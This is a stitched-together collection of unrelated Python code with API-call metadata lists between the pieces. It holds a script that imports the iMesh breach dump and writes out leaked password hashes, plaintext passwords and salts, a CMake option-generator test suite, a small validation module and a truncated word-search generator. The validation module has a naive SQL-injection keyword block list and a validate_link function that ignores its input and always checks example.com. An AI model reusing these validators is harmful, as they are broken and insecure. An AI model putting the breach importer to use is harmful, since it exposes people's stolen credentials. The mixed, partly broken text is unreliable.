    importer = ImeshImporter()
    dump_type = 'hashed'
    output_file = open(args.output_filename, "w", encoding='utf8')
    hash_file = None
    if args.hash_filename:
        hash_file = open(args.hash_filename, "w")
    processed_count = 0
    error_count = 0
    # Bug fix: start at 0, not 1. The counter is incremented before each record
    # is processed, so error messages previously reported line numbers off by one.
    line_num = 0
    for line in sys.stdin:
        try:
            hash_record = {}
            line_num += 1
            record = importer.process_record(line.rstrip(), dump_type, for_import=True)
            if record is None:
                eprint("Skipping: " + line.rstrip())
                continue
            # Emit the hash/password/salt side-channel record, if requested.
            if hash_file and hasattr(record, 'hash') and record.hash is not None:
                hash_record["hash"] = record.hash
                if hasattr(record, 'password') and record.password is not None:
                    hash_record["password"] = record.password
                if hasattr(record, 'salt') and record.salt is not None:
                    hash_record["salt"] = record.salt
                hash_record["hashtype"] = record.hashtype
                hash_file.write(json.dumps(hash_record) + '\n')
            # Delete any fields that are in the dump's ignore list
            if importer._import_ignore_fields:
                for fname in importer._import_ignore_fields:
                    if hasattr(record, fname):
                        delattr(record, fname)
            processed_count += 1
            output_file.write(record.to_json() + '\n')
            if 0 == processed_count % 100000:
                eprint("Processed %i, Errors: %i" % (processed_count, error_count))
        except ValidationError as vexp:
            error_count += 1
            eprint("ValidationError %r\n while processing line number %i\n %s" %
                   (vexp, line_num, line))
        except Exception as exp:
            error_count += 1
            eprint("Error %r\n while processing line number %i\n %s" %
                   (exp, line_num, line))
            traceback.print_exc(file=sys.stderr)
    print("Processed %i, Errors: %i" % (processed_count, error_count))
    output_file.close()
    if hash_file:
        hash_file.close()
| [
"sys.path.insert",
"breaches.imesh.imesh.ImeshImporter",
"argparse.ArgumentParser",
"json.dumps",
"sys.exit",
"os.path.abspath",
"traceback.print_exc",
"sys.path.append"
] | [((287, 318), 'sys.path.append', 'sys.path.append', (['project_folder'], {}), '(project_folder)\n', (302, 318), False, 'import sys\n'), ((516, 541), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (539, 541), False, 'import argparse\n'), ((1106, 1121), 'breaches.imesh.imesh.ImeshImporter', 'ImeshImporter', ([], {}), '()\n', (1119, 1121), False, 'from breaches.imesh.imesh import ImeshImporter\n'), ((233, 245), 'os.path.abspath', 'abspath', (['"""."""'], {}), "('.')\n", (240, 245), False, 'from os.path import dirname, abspath\n'), ((883, 894), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (891, 894), False, 'import sys\n'), ((1005, 1037), 'sys.path.insert', 'sys.path.insert', (['(0)', 'package_base'], {}), '(0, package_base)\n', (1020, 1037), False, 'import sys\n'), ((939, 956), 'os.path.abspath', 'abspath', (['__file__'], {}), '(__file__)\n', (946, 956), False, 'from os.path import dirname, abspath\n'), ((3092, 3128), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stderr'}), '(file=sys.stderr)\n', (3111, 3128), False, 'import traceback\n'), ((2188, 2211), 'json.dumps', 'json.dumps', (['hash_record'], {}), '(hash_record)\n', (2198, 2211), False, 'import json\n')] |
#!/usr/bin/env python3
# -*- mode: python; py-indent-offset: 4; py-continuation-offset: 4 -*-
#===============================================================================
#
# License (3-Clause BSD)
# ----------------------
# Copyright 2021 National Technology & Engineering Solutions of Sandia,
# LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
"""
"""
from __future__ import print_function
import sys
sys.dont_write_bytecode = True
import contextlib
import io
import os
sys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from pprint import pprint
import unittest
from unittest import TestCase
# Coverage will always miss one of these depending on the system
# and what is available.
try: # pragma: no cover
import unittest.mock as mock # pragma: no cover
except: # pragma: no cover
import mock # pragma: no cover
from mock import Mock
from mock import MagicMock
from mock import patch
import filecmp
from textwrap import dedent
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from setprogramoptions import *
from .common import *
# ===============================================================================
#
# General Utility Data
#
# ===============================================================================
global_gen_new_ground_truth_files = False
# global_gen_new_ground_truth_files = True # comment this out for production.
class DEFAULT_VALUE(object):
pass
# ===============================================================================
#
# General Utility Functions
#
# ===============================================================================
# ===============================================================================
#
# Mock Helpers
#
# ===============================================================================
# ===============================================================================
#
# Tests
#
# ===============================================================================
class SetProgramOptionsTestCMake(TestCase):
"""
Main test driver for the SetProgramOptions class
"""
def setUp(self):
print("")
self.maxDiff = None
self._filename = find_config_ini(filename="config_test_setprogramoptions.ini")
# Get the location of the unit testing scripts (for file writing tests)
unit_test_path = os.path.realpath(__file__)
self.unit_test_file = os.path.basename(unit_test_path)
self.unit_test_path = os.path.dirname(unit_test_path)
def test_SetProgramOptionsCMake_Template(self):
"""
Basic template test for SetProgramOptions.
This test doesn't really validate any output -- it just runs a basic check.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "CMAKE_GENERATOR_NINJA"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_property_inifilepath(self):
"""
Runs a check that loads the filename using `inifilepath` property
rather than the parameter in the c'tor.
"""
parser = self._create_standard_parser(filename=None)
parser.inifilepath = self._filename
print("-----[ TEST BEGIN ]----------------------------------------")
# parse all sections
print("-" * 40)
print("Execute Parser")
print("-" * 40)
sections = parser.configparserenhanceddata.sections(parse=False)
self.assertGreater(len(sections), 2)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TRILINOS_CONFIGURATION_ALPHA"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
print("-" * 40)
print("Option List")
print("-" * 40)
option_list_expect = [
'cmake',
'-G=Ninja',
'-DTrilinos_ENABLE_COMPLEX:BOOL=ON',
'-DTrilinos_ENABLE_THREAD_SAFE:BOOL=ON',
# '-DTrilinos_PARALLEL_COMPILE_JOBS_LIMIT=20',
# '-DTrilinos_PARALLEL_LINK_JOBS_LIMIT=4',
'-DTrilinos_ENABLE_Kokkos:BOOL=ON',
'-DTrilinos_ENABLE_KokkosCore:BOOL=ON',
'-DTrilinos_ENABLE_KokkosKernels:BOOL=ON',
'-DKokkosKernels_ENABLE_EXAMPLES:BOOL=ON',
'-DTrilinos_ENABLE_Tpetra:BOOL=ON',
'-DTpetra_INST_DOUBLE:BOOL=ON',
'/path/to/source/dir'
]
option_list_actual = parser.gen_option_list(section, generator="bash")
pprint(option_list_actual, width=200)
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash_expandvars(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator.
"""
parser = self._create_standard_parser()
# parser.exception_control_compact_warnings = True
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_01"
print("Section : {}".format(section))
self._execute_parser(parser, section)
print("-" * 40)
print("Option List")
print("-" * 40)
option_list_expect = [
'cmake',
'-DCMAKE_CXX_FLAGS:STRING="${LDFLAGS} -foo"',
]
option_list_actual = parser.gen_option_list(section, generator="bash")
pprint(option_list_actual, width=200)
self.assertListEqual(option_list_expect, option_list_actual)
print("OK")
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
# Update 03 will generate the update option
section = "TEST_VAR_EXPANSION_UPDATE_03"
print("Section : {}".format(section))
self._execute_parser(parser, section)
print("-" * 40)
print("Option List")
print("-" * 40)
option_list_expect = [
'cmake',
'-DCMAKE_CXX_FLAGS:STRING="${LDFLAGS} -foo"',
'-DCMAKE_CXX_FLAGS:STRING="${LDFLAGS} -foo -bif"',
]
option_list_actual = parser.gen_option_list(section, generator="bash")
pprint(option_list_actual, width=200)
self.assertListEqual(option_list_expect, option_list_actual)
print("OK")
print("-----[ TEST END ]------------------------------------------")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash_expandvars_with_unknown_cmake_var_ecl3(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator when the ECL for
ExpandVarsInTextCMake is set to 3 or lower. This should generate a WARNING.
"""
parser = self._create_standard_parser()
parser.exception_control_compact_warnings = False
parser.exception_control_level = 3
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_02"
print("Section : {}".format(section))
# parse the section
self._execute_parser(parser, section)
# Generate a BASH script representing the instructions in the section.
# what answer do we EXPECT:
option_list_expect = [
'cmake', '-DCMAKE_CXX_FLAGS:STRING="${LDFLAGS} -foo"', '-DCMAKE_F90_FLAGS:STRING=" -baz"'
]
# Generate the BASH entries:
option_list_actual = parser.gen_option_list(section, generator="bash")
# Verify the results:
self.assertListEqual(option_list_actual, option_list_expect)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash_expandvars_with_unknown_cmake_var_ecl4(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator when the ECL
for ExpandVarsInTextCMake is set to 4 or higher. This should raise a ``ValueError``.
"""
parser = self._create_standard_parser()
parser.exception_control_level = 5
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_02"
print("Section : {}".format(section))
# parse the section
self._execute_parser(parser, section)
# Generate a BASH script representing the instructions in the section.
with self.assertRaises(ValueError):
parser.gen_option_list(section, generator="bash")
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_cmake_fragment(self):
"""
Test the ``gen_option_list`` method using the ``cmake_fragment`` generator.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TRILINOS_CONFIGURATION_ALPHA"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
print("-" * 40)
print("Option List")
print("-" * 40)
option_list_expect = [
'set(Trilinos_ENABLE_COMPLEX ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_ENABLE_THREAD_SAFE ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_PARALLEL_COMPILE_JOBS_LIMIT 20)',
'set(Trilinos_PARALLEL_LINK_JOBS_LIMIT 4)',
'set(Trilinos_ENABLE_Kokkos ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_ENABLE_KokkosCore ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_ENABLE_KokkosKernels ON CACHE BOOL "from .ini configuration")',
'set(KokkosKernels_ENABLE_EXAMPLES ON CACHE BOOL "from .ini configuration")',
'set(Trilinos_ENABLE_Tpetra ON CACHE BOOL "from .ini configuration")',
'set(Tpetra_INST_DOUBLE ON CACHE BOOL "from .ini configuration")'
]
option_list_actual = parser.gen_option_list(section, generator="cmake_fragment")
pprint(option_list_actual, width=200)
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_cmake_fragment_expandvars(self):
"""
Test the ``gen_option_list`` method using the ``bash`` generator.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_02"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
parser.gen_option_list(section, generator="cmake_fragment")
option_list_expect = [
'set(CMAKE_CXX_FLAGS "$ENV{LDFLAGS} -foo" CACHE STRING "from .ini configuration")',
'set(CMAKE_F90_FLAGS "${CMAKE_F90_FLAGS} -baz" CACHE STRING "from .ini configuration")'
]
option_list_actual = parser.gen_option_list(section, generator="cmake_fragment")
print("Expected Output:\n{}\n".format("\n".join(option_list_expect)))
print("Actual Output:\n{}\n".format("\n".join(option_list_actual)))
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
# Test that the CMake generator will generate a sequence of operations
# that don't include a FORCE option on an update of an existing CACHE
# value. As far as SPOCM is concerned, it'll generate the CMake as
# defined in the .ini file.
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_01"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
parser.gen_option_list(section, generator="cmake_fragment")
option_list_expect = [
'set(CMAKE_CXX_FLAGS "$ENV{LDFLAGS} -foo" CACHE STRING "from .ini configuration")',
'set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -bar" CACHE STRING "from .ini configuration")',
]
option_list_actual = parser.gen_option_list(section, generator="cmake_fragment")
print("Expected Output:\n{}\n".format("\n".join(option_list_expect)))
print("Actual Output:\n{}\n".format("\n".join(option_list_actual)))
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
# Test that the CMake generator will generate a sequence of operations
# that do include a FORCE option on an update of an existing CACHE
# value. As far as SPOCM is concerned w/rt to CMake fragments, we will
# generate what the .ini file tells us to do and respect that the CMake
# engine will operate as the CMake engine does.
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_VAR_EXPANSION_UPDATE_03"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
parser.gen_option_list(section, generator="cmake_fragment")
option_list_expect = [
# Sets CMAKE_CXX_FLAGS the _first_ time, CMAKE_CXX_FLAGS would be set.
'set(CMAKE_CXX_FLAGS "$ENV{LDFLAGS} -foo" CACHE STRING "from .ini configuration")',
# Tries to update CMAKE_CXX_FLAGS the _second_ time without FORCE.
# CMake will not save this.
'set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -bar" CACHE STRING "from .ini configuration")',
# Tries to update CMAKE_CXX_FLAGS again but this time uses FORCE.
# CMake will save this updated value.
'set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -bif" CACHE STRING "from .ini configuration" FORCE)',
]
option_list_actual = parser.gen_option_list(section, generator="cmake_fragment")
print("Expected Output:\n{}\n".format("\n".join(option_list_expect)))
print("Actual Output:\n{}\n".format("\n".join(option_list_actual)))
self.assertListEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_param_order_01(self):
"""
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_CACHE_PARAM_ORDER"
print("Section : {}".format(section))
self._execute_parser(parser, section)
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_bash_expect = [
'-DCMAKE_VAR_A:STRING="ON"',
'-DCMAKE_VAR_C:BOOL=ON',
'-DCMAKE_VAR_D:BOOL=ON',
'-DCMAKE_VAR_E:BOOL=ON',
]
option_list_bash_actual = parser.gen_option_list(section, generator="bash")
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
option_list_cmake_fragment_expect = [
'set(CMAKE_VAR_A ON CACHE STRING "from .ini configuration" FORCE)',
'set(CMAKE_VAR_B ON PARENT_SCOPE)',
'set(CMAKE_VAR_C ON CACHE BOOL "from .ini configuration")',
'set(CMAKE_VAR_D ON CACHE BOOL "from .ini configuration" FORCE)',
'set(CMAKE_VAR_E ON CACHE BOOL "from .ini configuration" FORCE)',
'set(CMAKE_VAR_F ON CACHE BOOL "from .ini configuration" PARENT_SCOPE)',
'set(CMAKE_VAR_G ON CACHE BOOL "from .ini configuration" PARENT_SCOPE)',
]
option_list_cmake_fragment_actual = parser.gen_option_list(section, generator="cmake_fragment")
self.assertListEqual(option_list_cmake_fragment_expect, option_list_cmake_fragment_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_param_order_02(self):
"""
Tests that we correctly generate output if extra flags
are provided such as something to uniqueify a .ini option entry.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_CMAKE_CACHE_PARAM_TEST_02"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
option_list_bash_expect = ['-DCMAKE_VAR_A:STRING="ON"']
option_list_bash_actual = parser.gen_option_list(section, generator="bash")
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_bash_generator_ignores_PARENT_SCOPE(self):
"""
Verify that the bash generator will not add a ``-D`` entry for a
``opt-set-cmake-var`` that has the ``PARENT_SCOPE`` flag since that
will always force CMake to create a type-1 (non-cache) var assignment.
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_PARENT_SCOPE_NOT_BASH"
print("Section : {}".format(section))
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_bash_expect = []
option_list_bash_actual = parser.gen_option_list(section, generator="bash")
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_cmake_fragment_expect = [
'set(FOO_VAR_A "FOO_VAL A" PARENT_SCOPE)',
'set(FOO_VAR_B "FOO_VAL B" CACHE STRING "from .ini configuration" PARENT_SCOPE)'
]
option_list_cmake_fragment_actual = parser.gen_option_list(section, generator="cmake_fragment")
self.assertListEqual(option_list_cmake_fragment_expect, option_list_cmake_fragment_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_fail_on_FORCE_and_PARENT_SCOPE(self):
"""
Tests the case that both PARENT_SCOPE and FORCE are provided.
This will cause a CMake error beacuse the existence of PARENT_SCOPE
forces CMake to use a Type-1 set operation, i.e. a NON-CACHEd
variable. However ``FORCE`` is only valid for a CACHED variable (Type-2).
These two options are mutually exclusive and CMake will fail.
In this case SetProgramOptionsCMake should raise a CATASTROPHIC
error because the operation provided is invalid.
"""
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_CMAKE_FAIL_ON_PARENT_SCOPE_AND_FORCE"
print("Section : {}".format(section))
# parse a section
self._execute_parser(parser, section)
with self.assertRaises(ValueError):
parser.gen_option_list(section, generator="bash")
print("-----[ TEST END ]------------------------------------------")
print("OK")
return
def test_SetProgramOptionsCMake_test_STRING_value_surrounded_by_double_quotes(self):
"""
Test STRING values are surrounded by double quotes.
"""
print("\n")
print("Load file: {}".format(self._filename))
parser = self._create_standard_parser()
print("-----[ TEST BEGIN ]----------------------------------------")
section = "TEST_STRING_DOUBLE_QUOTES"
print("Section : {}".format(section))
option_list_expect = ['-DFOO:STRING="foo::bar::baz<Type>"', '-DBAR:STRING="600"']
option_list_actual = parser.gen_option_list(section, generator="bash")
print("-" * 40)
print("Options List Expect")
print("-" * 40)
pprint(option_list_expect, width=120)
print("")
print("Options List Actual")
print("-" * 40)
pprint(option_list_actual, width=120)
self.assertEqual(option_list_expect, option_list_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_opt_remove(self):
"""
This test validates that `opt-remove` will correctly remove a CMake var
that was created using `opt-set-cmake-var`
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_VAR_REMOVE"
print("Section : {}".format(section))
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_bash_actual = parser.gen_option_list(section, 'bash')
option_list_bash_expect = ['-DBAR_TEST:STRING="BAR"', '-DBAZ_TEST:STRING="BAZ"']
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_cmake_fragment_actual = parser.gen_option_list(section, 'cmake_fragment')
option_list_cmake_fragment_expect = [
'set(BAR_TEST BAR CACHE STRING "from .ini configuration")',
'set(BAZ_TEST BAZ CACHE STRING "from .ini configuration")'
]
self.assertListEqual(option_list_cmake_fragment_expect, option_list_cmake_fragment_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_FORCE_only_for_bash(self):
"""
Test that an ``opt-set-cmake-var`` that has a FORCE but does
not specify a TYPE will be assigned STRING by default and will
generate the appropriate ``-D`` entry.
[TEST_CMAKE_VAR_FORCE_ONLY]
opt-set-cmake-var FOO FORCE : "BAR"
should generate:
-DFOO:STRING="BAR"
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_VAR_FORCE_ONLY"
print("Section : {}".format(section))
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_bash_actual = parser.gen_option_list(section, 'bash')
option_list_bash_expect = [
'-DFOO:STRING="BAR"',
]
self.assertListEqual(option_list_bash_expect, option_list_bash_actual)
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
option_list_cmake_fragment_actual = parser.gen_option_list(section, 'cmake_fragment')
option_list_cmake_fragment_expect = [
'set(FOO BAR CACHE STRING "from .ini configuration" FORCE)',
]
self.assertListEqual(option_list_cmake_fragment_expect, option_list_cmake_fragment_actual)
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def test_SetProgramOptionsCMake_gen_option_list_bash_unresolved_cmake_var_01(self):
"""
Tests what we do with an unresolved cmake variable encountered in the
bash generator. The hitch is that if we replace the unresolved cmake
var with an empty string we may be allowing a ``cmake-fragment`` and a
``bash command`` to diverge sicne the cmake fragment would have additional
context of pre-existing variables that *might exist* versus the bash command
where a cmake variable *definitely will not exist*.
"""
parser = self._create_standard_parser()
section = "TEST_CMAKE_VAR_IN_BASH_GENERATOR"
print("Section : {}".format(section))
print("-----[ TEST BEGIN ]----------------------------------------")
# Test 1: Validate exception is raised when `exception_control_level`
# is the default (4).
with self.assertRaises(ValueError):
option_list_actual = parser.gen_option_list(section, generator='bash')
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
# Test 2: Reduce the `exception_control_level` so that the exception is
# not generated.
# - Sets `exception_control_level` to 3
# - Sets `exception_control_compact_warnings` to False
# Note: This test is sensitive to formatting changes to `ExceptionControl`
# if this is a big problem we may need to change this in the future
# to be less sensitive to stdout.
option_list_expect = [
'-DFOO_VAR:STRING="FOO"',
'-DFOO_VAR:STRING="BAR "'
]
parser.exception_control_level = 3
parser.exception_control_compact_warnings = False
with io.StringIO() as m_stdout:
with contextlib.redirect_stdout(m_stdout):
option_list_actual = parser.gen_option_list(section, generator='bash')
# Check that the output matches
self.assertListEqual(option_list_expect, option_list_actual)
# Check that the exception-control warning message gets printed
self.assertIn("EXCEPTION SKIPPED", m_stdout.getvalue())
self.assertIn("Event Type : MINOR", m_stdout.getvalue())
self.assertIn("Exception : ValueError", m_stdout.getvalue())
print("-----[ TEST END ]------------------------------------------")
print("-----[ TEST BEGIN ]----------------------------------------")
# Test 2: Repeat the previous test but with *compact* warnings from
# `exception_control_compact_warnings` set to True to enable
# compact warnings.
# - Sets `exception_control_level` to 3
# - Sets `exception_control_compact_warnings` to True
# Note: This test is sensitive to formatting changes to `ExceptionControl`
# if this is a big problem we may need to change this in the future
# to be less sensitive to stdout.
option_list_expect = [
'-DFOO_VAR:STRING="FOO"',
'-DFOO_VAR:STRING="BAR "'
]
parser.exception_control_level = 3
parser.exception_control_compact_warnings = True
with io.StringIO() as m_stdout:
with contextlib.redirect_stdout(m_stdout):
option_list_actual = parser.gen_option_list(section, generator='bash')
# Check that the output matches
self.assertListEqual(option_list_expect, option_list_actual)
# Check that the exception-control warning message gets printed
self.assertIn("EXCEPTION SKIPPED", m_stdout.getvalue())
self.assertIn("(MINOR : ValueError)", m_stdout.getvalue())
print("-----[ TEST END ]------------------------------------------")
print("OK")
return 0
def _create_standard_parser(
self, filename=DEFAULT_VALUE(), debug_level=5, ece_level=4, ece_compact=False
):
if isinstance(filename, DEFAULT_VALUE):
filename = self._filename
output = None
if filename is not None:
print("\n")
print("filename: {}".format(filename))
output = SetProgramOptionsCMake(filename)
else:
output = SetProgramOptionsCMake()
output.debug_level = debug_level
output.exception_control_level = ece_level
output.exception_control_compact_warnings = ece_compact
return output
def _execute_parser(self, parser, section):
output = None
# parse a section
print("-" * 40)
print("Execute Parser")
print("-" * 40)
output = parser.parse_section(section)
# pretty print the output
print("-" * 40)
print("Output")
print("-" * 40)
pprint(output, width=120)
# pretty print the loginfo
print("-" * 40)
print("LogInfo")
print("-" * 40)
parser._loginfo_print()
return output
| [
"contextlib.redirect_stdout",
"os.path.realpath",
"os.path.dirname",
"os.path.basename",
"os.path.abspath",
"io.StringIO",
"pprint.pprint"
] | [((4147, 4173), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (4163, 4173), False, 'import os\n'), ((4204, 4236), 'os.path.basename', 'os.path.basename', (['unit_test_path'], {}), '(unit_test_path)\n', (4220, 4236), False, 'import os\n'), ((4267, 4298), 'os.path.dirname', 'os.path.dirname', (['unit_test_path'], {}), '(unit_test_path)\n', (4282, 4298), False, 'import os\n'), ((7024, 7061), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(200)'}), '(option_list_actual, width=200)\n', (7030, 7061), False, 'from pprint import pprint\n'), ((8034, 8071), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(200)'}), '(option_list_actual, width=200)\n', (8040, 8071), False, 'from pprint import pprint\n'), ((8861, 8898), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(200)'}), '(option_list_actual, width=200)\n', (8867, 8898), False, 'from pprint import pprint\n'), ((12820, 12857), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(200)'}), '(option_list_actual, width=200)\n', (12826, 12857), False, 'from pprint import pprint\n'), ((23512, 23549), 'pprint.pprint', 'pprint', (['option_list_expect'], {'width': '(120)'}), '(option_list_expect, width=120)\n', (23518, 23549), False, 'from pprint import pprint\n'), ((23637, 23674), 'pprint.pprint', 'pprint', (['option_list_actual'], {'width': '(120)'}), '(option_list_actual, width=120)\n', (23643, 23674), False, 'from pprint import pprint\n'), ((31667, 31692), 'pprint.pprint', 'pprint', (['output'], {'width': '(120)'}), '(output, width=120)\n', (31673, 31692), False, 'from pprint import pprint\n'), ((2189, 2214), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (2204, 2214), False, 'import os\n'), ((28537, 28550), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (28548, 28550), False, 'import io\n'), ((30049, 30062), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (30060, 30062), False, 'import io\n'), ((28581, 28617), 
'contextlib.redirect_stdout', 'contextlib.redirect_stdout', (['m_stdout'], {}), '(m_stdout)\n', (28607, 28617), False, 'import contextlib\n'), ((30093, 30129), 'contextlib.redirect_stdout', 'contextlib.redirect_stdout', (['m_stdout'], {}), '(m_stdout)\n', (30119, 30129), False, 'import contextlib\n')] |
import random
import string
import requests
def SQL_SYNTAX_CHECK(input: str) -> bool:
bad_char = ['*',';','SELECT ',' FROM ', ' TRUE ', ' WHERE ']
for char in bad_char:
if char in input:
return False
return True
def validateRegistration(name, uname, email, password, confirm):
if len(name) < 1 or len(name) > 45:
return "Error invalid name"
if len(uname) < 1 or len(uname) > 20:
return "Error invalid username"
if len(email) < 1 or len(email) > 100:
return "Error invalid email"
if len(password) < 1:
return "Error invalid password"
if password != confirm:
return "Error passwords do not match"
return "Success"
def validate_email(email: str):
at_counter = 0
for x in email:
if x == "@":
at_counter+=1
if at_counter == 1:
return True
else:
return False
def validate_link(link: str):
req = requests.get('http://www.example.com')
if req.status_code == 200:
return True
else:
return False
def generate_link() -> str:
letters = string.ascii_lowercase+string.ascii_uppercase+"0123456789"
return (''.join(random.choice(letters) for i in range(10))) | [
"random.choice",
"requests.get"
] | [((964, 1002), 'requests.get', 'requests.get', (['"""http://www.example.com"""'], {}), "('http://www.example.com')\n", (976, 1002), False, 'import requests\n'), ((1207, 1229), 'random.choice', 'random.choice', (['letters'], {}), '(letters)\n', (1220, 1229), False, 'import random\n')] |
from random import choice, randint
import os
def generate_grid(w, h):
global width, height
alphabet = 'qwertyuiopasdfghjklzxcvbnm'
grid = []
for i in range(h):
row = []
for j in range(w):
row.append(' ')
grid.append(row)
return grid
def populate_grid(words, grid):
for word in words:
done = False
tries = 10
while not done:
try:
start_x = randint(0, len(grid[0]) - len(word))
start_y = randint(0, len(grid) - len(word))
vel = choice([(1, 0), (0, 1), (1, 1)])
except ValueError:
done = True
break
valid_spot = True
